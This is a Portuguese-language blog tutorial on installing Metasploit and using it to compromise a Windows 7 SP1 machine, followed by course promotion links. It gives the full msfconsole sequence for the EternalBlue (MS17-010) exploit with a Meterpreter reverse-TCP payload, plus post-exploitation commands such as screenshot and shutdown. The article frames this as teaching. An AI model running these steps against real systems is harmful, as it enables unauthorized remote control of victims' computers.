O Metasploit é uma ferramenta usada por pentesters para avaliar as capacidade de segurança de um sistema, fazer invasões e também detectar intrusos. É uma ferramenta muito comum em distribuições Linux voltadas para este meio, como o Kali Linux. Hoje você vai conhecer uma de suas facetas.
O Metasploit é um projeto de segurança da informação que fornece informações sobre vulnerabilidades de segurança e ajuda nos testes de penetração. É de propriedade da empresa de segurança Rapid7, de Boston, Massachusetts, que possui diversos softwares (Opcode - Banco de Dados ; e o Shellcode , que executa comandos de Shell Script... ), entre eles o mais conhecido é o Metasploit Framework, um software de código aberto para explorar falhas de uma máquina remota.
O Metasploit possui 6 tipos de módulos (auxiliary, exploit, payload, post, encoder e nop) . No vídeo apresentado por nós, vamos utilizar o Meterpreter que é um payload avançado.
Instalação
Existem diversas maneiras de você instalar o Metasploit Framework. Baixando diretamente pelo site ou pelo GitHub.
Para quem gosta de fazer manualmente, é possível instalá-lo via gerenciador de pacotes da sua distribuição, por exemplo, na distribuição Ubuntu, Linux Mint, Debian e derivados basta realizar os comandos abaixo:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
sudo ./msfinstall
msfdb init
E pronto, o Metasploit está pronto para uso!
Lembrando que em algumas distribuições já possuem o Metasploit instalado por padrão, como o Pentoo e o Kali Linux, entre outras criadas especialmente para testes de invasão.
O Próximo passo é rodar o Metasploit por este comando:
msfconsole
Isso irá abrir o framework, e em seguida usaremos o Meterpreter para acessar o Windows , basta rodar os comandos abaixo na ordem:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST NÚMERO_IP_DA_MÁQUINA_WINDOWS
set payload windows/x64/meterpreter/reverse_tcp
set LHOST NÚMERO_IP_DA_SUA_MÁQUINA
set encoder generic/none
exploit
Lembrando que esses comandos são "a grosso modo", e servem para Windows 7 Service Pack 1 , para outras versões assista o vídeo com link abaixo que há mais detalhes para variados casos.
Após acessar você pode obter informações detalhadas do sistema com o comando sysinfo; tirar um print da tela com o comando screenshot ; saber qual diretório você está com o comando pwd a saída será algo do tipo *c:32* ; desligar, reiniciar,... entre vários comandos que podem ser consultados pelo comando help .
Confira o exemplo no vídeo:
Confira o exemplo no vídeo:
Esse artigo e o vídeo apresentado foram criados com finalidade didática, mantenha o seu Windows atualizado para evitar ser exposto a coisas do tipo. A falha explorada neste exemplo, por exemplo, já foi corrigida pela Microsoft, daí a importância de manter os sistemas sempre atualizados.
Se você ainda não domina Shell Script e o Terminal Linux. Aproveite uma promoção onde você pode adquirir 5 cursos de terminal Linux, incluindo Shell Script, Expressões Regulares, Vim e Sed.
Clicando nesse link http://bit.ly/Promo5pg para adquirir com o PagSeguro ou nesse link http://bit.ly/5CursosLinux para adquirir com o PayPal. Se quiser mais detalhes da promoção veja essa postagem: 5 Cursos do Terminal Linux para você !
Esse artigo foi escrito em parceria com a galera do Terminal Root, os quais são os autores dos cursos mencionados acima, até a próxima!_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.